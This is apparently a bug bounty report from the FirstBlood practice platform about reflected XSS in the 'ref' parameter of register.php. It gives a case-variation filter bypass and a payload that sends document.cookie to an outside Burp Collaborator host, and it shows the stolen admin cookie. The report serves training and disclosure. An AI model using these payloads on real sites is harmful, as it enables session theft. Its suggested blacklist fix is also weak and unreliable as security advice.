FirstBlood-#703Reflective XSS on register page
This issue was discovered on FirstBlood v2

On 2021-10-27, axe Level 4 reported:

Steps

  1. After the test is finished and reset, continue to test XSS in ref parameter

  2. Insert <svg/onload=alert(0)> - > F12 - > angle brackets are found to be HTML encoded

  3. Insert XSS payload after URL encoding: <script>alert(0)</script> - > it is found that script is filtered

  4. After testing, it is found that the case is not strictly filtered. Finally, XSS payload is used: JaVascrIPt:alert(0) - > bypass success!

Vulnerability Exploitation

XSS -> JSOP Upgrade Utilization

/register.php?ref=JaVascrIPt:window.location.href=`https://accounts.google.com/o/oauth2/revoke?callback=alert(1337)`

Open Redirect -> XSS -> Stealing Token

  1. Open Redirect(Resolved #537)

  2. XSS(Resolved)

  3. I can't solve it for now. I can't get the drps cookie value because I'm not logged in to the admin credentials.

ref=jaVaScRipt:window.location.href=`http://orj0lpqahknr61w80s3opl4i59b0zp.burpcollaborator.net/${document.cookie}

  1. Successfully obtained the administrator's cookie!!! https://orj0lpqahknr61w80s3opl4i59b0zp.burpcollaborator.net/doctorAuthed=eyJkb2N0b3JBdXRoIjphdXRoZWR9;%20drps=5a1884f0368eae4bb80dcbebd

Suggestions for fixing

  1. blacklist all JavaScript cases

Study reference materials

  1. https://blog.detectify.com/2019/05/16/the-real-impact-of-an-open-redirect/

  2. https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20Injection#bypass-case-sensitive

  3. https://www.bugbountyhunter.com/vulnerability/?type=xss

P3 Medium

Endpoint: /register.php

Parameter: ref

Payload: jaVaScRipt:alert`1`

FirstBlood ID: 32
Vulnerability Type: Reflective XSS

The parameter ?ref on register.php was poorly fixed and can be bypassed in various ways. Firstly the developer failed to use strtolower() when comparing strings, and the use of characters such as %09 will also bypass the filter.